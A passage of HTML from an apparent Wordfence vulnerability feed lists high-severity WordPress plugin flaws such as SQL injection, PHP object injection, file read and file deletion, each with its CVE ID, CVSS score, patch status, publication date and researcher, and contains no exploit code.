					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16144" target="_blank" rel="noopener noreferrer">							CVE-2026-16144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d692aff-8bb2-45bb-9caf-bc33d3ed5b10" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5c8cb3-df67-4f2c-869a-48e34f5619ff" target="_blank" rel="noopener">NEX-Forms &lt;= 9.2.3 &#8211;  Authenticated (Admin+) Arbitrary File Deletion via Path Traversal via &#8216;location&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15450" target="_blank" rel="noopener noreferrer">							CVE-2026-15450						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">NEX-Forms – Ultimate Forms Plugin for WordPress</a> <span class="wfvr-software-slug">[nex-forms-express-wp-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5c8cb3-df67-4f2c-869a-48e34f5619ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b00da60-7d2d-467e-ab58-0bb4af0cbda5" target="_blank" rel="noopener">Bit integrations &lt;= 2.9.0 &#8211; Unauthenticated Arbitrary File Read via Optional CF7 File Field</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15006" target="_blank" rel="noopener noreferrer">							CVE-2026-15006						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-integrations" target="_blank" rel="noopener">Bit integrations – Form Integration, Webhook, Spreadsheets, CRM, LMS &amp; Email Automation</a> <span class="wfvr-software-slug">[bit-integrations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b00da60-7d2d-467e-ab58-0bb4af0cbda5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/467dd833-2f47-43cd-8d13-dffdad394b3c" target="_blank" rel="noopener">BuddyPress &lt;= 14.5.0 &#8211; Authenticated (Subscriber+) PHP Object Injection via XProfile Field Data</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1360" target="_blank" rel="noopener noreferrer">							CVE-2026-1360						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">BuddyPress</a> <span class="wfvr-software-slug">[buddypress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d996746957e68308f3af4295949d729c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d996746957e68308f3af4295949d729c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-theriault-laine" target="_blank" rel="noopener">Vincent Theriault-Laine</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/467dd833-2f47-43cd-8d13-dffdad394b3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ea72320-0e1e-45e3-987d-9ab7eecf1aee" target="_blank" rel="noopener">CubeWP Framework &lt;= 1.1.30 &#8211; Unauthenticated Arbitrary File Read via prev_icon/next_icon Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13339" target="_blank" rel="noopener noreferrer">							CVE-2026-13339						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">CubeWP Framework</a> <span class="wfvr-software-slug">[cubewp-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ea72320-0e1e-45e3-987d-9ab7eecf1aee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12be30fc-2d7e-4326-b949-45138796c1a9" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar &lt; 5.3.7 &#8211; Authenticated (Contributor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16062" target="_blank" rel="noopener noreferrer">							CVE-2026-16062						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12be30fc-2d7e-4326-b949-45138796c1a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0bbf47-a8c7-489d-a758-7b5771c2fcbd" target="_blank" rel="noopener">Export User Data &lt;= 2.2.6 &#8211; Authenticated (Subscriber+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65552" target="_blank" rel="noopener noreferrer">							CVE-2026-65552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-user-data" target="_blank" rel="noopener">Export User Data</a> <span class="wfvr-software-slug">[export-user-data]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0bbf47-a8c7-489d-a758-7b5771c2fcbd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58dfc436-7ef9-4e1e-9cf2-e5da264f7959" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress &lt;= 3.2.10 &#8211; Authenticated (Author+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65549" target="_blank" rel="noopener noreferrer">							CVE-2026-65549						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</a> <span class="wfvr-software-slug">[jeg-elementor-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58dfc436-7ef9-4e1e-9cf2-e5da264f7959" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c55abc7-b09d-4fea-bc2f-b903d3da119f" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System &lt;= 27.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14516" target="_blank" rel="noopener noreferrer">							CVE-2026-14516						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2c009f880c37af5ab9adcc8490628a98.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c009f880c37af5ab9adcc8490628a98"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c55abc7-b09d-4fea-bc2f-b903d3da119f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/178e2537-e900-4264-9b29-1bb5bac36f48" target="_blank" rel="noopener">PickPlugins Question Answer &lt;= 1.2.73 &#8211; Unauthenticated SQL Injection via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10207" target="_blank" rel="noopener noreferrer">							CVE-2026-10207						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/question-answer" target="_blank" rel="noopener">PickPlugins Question Answer</a> <span class="wfvr-software-slug">[question-answer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/178e2537-e900-4264-9b29-1bb5bac36f48" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b288386c-709c-49a6-9b46-28bf46c3c303" target="_blank" rel="noopener">Premium Packages &lt;= 6.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12800" target="_blank" rel="noopener noreferrer">							CVE-2026-12800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b288386c-709c-49a6-9b46-28bf46c3c303" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1de1f5-6530-4cca-8b9e-3cb7e01e3cf2" target="_blank" rel="noopener">Qode Tours &lt;= 3.1.3.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65546" target="_blank" rel="noopener noreferrer">							CVE-2026-65546						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qode-tours" target="_blank" rel="noopener">Qode Tours</a> <span class="wfvr-software-slug">[qode-tours]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1de1f5-6530-4cca-8b9e-3cb7e01e3cf2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42acc6e4-ceee-4551-bca4-4f8d0a958eef" target="_blank" rel="noopener">Simply Schedule Appointments &lt;= 1.6.12.10 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65508" target="_blank" rel="noopener noreferrer">							CVE-2026-65508						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">Simply Schedule Appointments</a> <span class="wfvr-software-slug">[simply-schedule-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42acc6e4-ceee-4551-bca4-4f8d0a958eef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b0e973b-f0bf-44d1-b964-e259f68291aa" target="_blank" rel="noopener">TrueBooker &lt;= 1.2.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13161" target="_blank" rel="noopener noreferrer">							CVE-2026-13161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fb7c688fd0a4e11bf489da14ffa632a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fb7c688fd0a4e11bf489da14ffa632a3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener">Karan J</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b0e973b-f0bf-44d1-b964-e259f68291aa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfa1538-7722-458d-a6a5-adde03e21e1a" target="_blank" rel="noopener">Uncanny Automator &lt;= 7.3.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Integration Metadata Disclosure via Multiple AJAX Endpoints</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
